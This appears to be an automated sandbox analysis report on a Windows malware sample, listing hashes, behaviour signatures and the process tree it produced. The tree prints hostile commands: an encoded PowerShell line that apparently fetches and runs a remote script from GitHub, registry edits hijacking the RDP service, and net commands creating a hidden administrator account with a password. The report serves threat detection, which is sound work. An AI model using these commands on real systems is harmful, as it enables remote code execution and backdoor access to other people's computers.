Analysis
-
max time kernel
132s -
max time network
133s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-11-2020 17:43
General
-
Target
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
-
Size
3.4MB
-
MD5
af944f00c218cc525ef7e56f5d634cdf
-
SHA1
532a7870f610b86ef3c1eb3f10b60a9da6152bcb
-
SHA256
1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2
-
SHA512
62b68e3651ae7a0222bc3a16442994b9c6d6505965e7b081bac168659b6eb97bbbb0cc5db260e65f4185017de62a5dc16c37347e447467db75ae062022533014
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 9 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies service 2 TTPs 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Modifies data under HKEY_USERS 217 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 77 IoCs
-
Suspicious use of WriteProcessMemory 68 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe"C:\Users\Admin\AppData\Local\Temp\1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x4qns4nh\x4qns4nh.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE08.tmp" "c:\Users\Admin\AppData\Local\Temp\x4qns4nh\CSC2BC06D68D97C49B4A01877BFEAB6C4F7.TMP"4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin qVojyFfh /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin qVojyFfh /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin qVojyFfh /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin qVojyFfh1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user updwin qVojyFfh2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin qVojyFfh3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RESAE08.tmpMD5
539ef5fde4c4c647255c7b9fbe1dc409
SHA146edce61a8161ec08fcc62ac9b99e6df253671da
SHA2566edd9fe30a59bdb8254775951215b91b776ee8bed657d8c5e65bc5a3badeb7f9
SHA512fa3c605042a19eb8160528c57da9cc2894acc967cd3ebd796fecd9f698e329dc6a825497b005bb82d6a0716959216ef238c014f86f385963dff28146c19df65e
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Users\Admin\AppData\Local\Temp\x4qns4nh\x4qns4nh.dllMD5
9f8ecbc9c0c19bac7409ae7a459044b9
SHA1709c07554173c190e171e38f14c2301a062f671b
SHA25657846d837809a7715d768e9a4773f3f1091a2161eebc0ad03942e6acf11f8458
SHA512ed7fa162c0362c2204a0ec91bb02e7d84fb338ad5575071e77c7bdb72fc9ec9f46eb783730add2844182eb87078fc13d4758be667d364b5bd74413acfb733a35
-
\??\c:\Users\Admin\AppData\Local\Temp\x4qns4nh\CSC2BC06D68D97C49B4A01877BFEAB6C4F7.TMPMD5
c1f621e1f90285325043e2a08de8a2da
SHA1ed4c2b3a0957212666fdb6b641f3e5d572ccaf03
SHA256522e86fe0f5c8684aa4d1c47d957264c827da7d0f810c96652ec7dca1421c373
SHA512e9981f35ee164f62883bb8baccb6e2cf6d9ef4c1cbab087b1f98c69e6211b8781de595bad50efc4760ef565c2b5d7935b74425fc455aad70d108549a761e5b76
-
\??\c:\Users\Admin\AppData\Local\Temp\x4qns4nh\x4qns4nh.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\x4qns4nh\x4qns4nh.cmdlineMD5
9167131ccc835661d4aaaa34ad57d2c2
SHA1ba95628e502694990fb96ce5f461cb29efb8f869
SHA25614a7c285231e444d9f0ee2d46670c90a27e12070ac332f1ab090a001b4442264
SHA5129bef6fa843504a37f5d9993b824ef723129154f446b41c12891f948d9531a91cbc9b2f5a0a5caa975ef16ee6323ee56258571f07ccfa2b9d67dcc90aac46eb64
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/68-31-0x0000000000000000-mapping.dmp
-
memory/188-15-0x0000000000000000-mapping.dmp
-
memory/360-27-0x0000000000000000-mapping.dmp
-
memory/580-42-0x0000000000000000-mapping.dmp
-
memory/744-23-0x0000000000000000-mapping.dmp
-
memory/744-7-0x0000000000000000-mapping.dmp
-
memory/1260-48-0x0000000000000000-mapping.dmp
-
memory/1260-49-0x00007FFB56540000-0x00007FFB56F2C000-memory.dmpFilesize
9.9MB
-
memory/1264-36-0x0000000000000000-mapping.dmp
-
memory/1400-1-0x0000000001890000-0x0000000001891000-memory.dmpFilesize
4KB
-
memory/1404-41-0x0000000000000000-mapping.dmp
-
memory/1908-25-0x0000000000000000-mapping.dmp
-
memory/2144-24-0x0000000000000000-mapping.dmp
-
memory/2168-35-0x0000000000000000-mapping.dmp
-
memory/2212-44-0x0000000000000000-mapping.dmp
-
memory/2228-10-0x0000000000000000-mapping.dmp
-
memory/2228-22-0x0000000000000000-mapping.dmp
-
memory/2260-20-0x0000000000000000-mapping.dmp
-
memory/2432-39-0x0000000000000000-mapping.dmp
-
memory/2660-46-0x0000000000000000-mapping.dmp
-
memory/2668-32-0x0000000000000000-mapping.dmp
-
memory/2692-38-0x0000000000000000-mapping.dmp
-
memory/2756-21-0x0000000000000000-mapping.dmp
-
memory/2792-26-0x0000000000000000-mapping.dmp
-
memory/2932-19-0x0000000000000000-mapping.dmp
-
memory/2944-47-0x0000000000000000-mapping.dmp
-
memory/3264-33-0x0000000000000000-mapping.dmp
-
memory/3264-40-0x0000000000000000-mapping.dmp
-
memory/3384-34-0x0000000000000000-mapping.dmp
-
memory/3384-18-0x0000000000000000-mapping.dmp
-
memory/3456-17-0x0000000000000000-mapping.dmp
-
memory/3852-30-0x0000000000000000-mapping.dmp
-
memory/3892-5-0x0000023EDD750000-0x0000023EDD751000-memory.dmpFilesize
4KB
-
memory/3892-14-0x0000023EDD6E0000-0x0000023EDD6E1000-memory.dmpFilesize
4KB
-
memory/3892-4-0x0000023EDD550000-0x0000023EDD551000-memory.dmpFilesize
4KB
-
memory/3892-3-0x00007FFB56540000-0x00007FFB56F2C000-memory.dmpFilesize
9.9MB
-
memory/3892-2-0x0000000000000000-mapping.dmp
-
memory/3932-16-0x0000000000000000-mapping.dmp
-
memory/3932-45-0x0000000000000000-mapping.dmp
-
memory/3996-37-0x0000000000000000-mapping.dmp
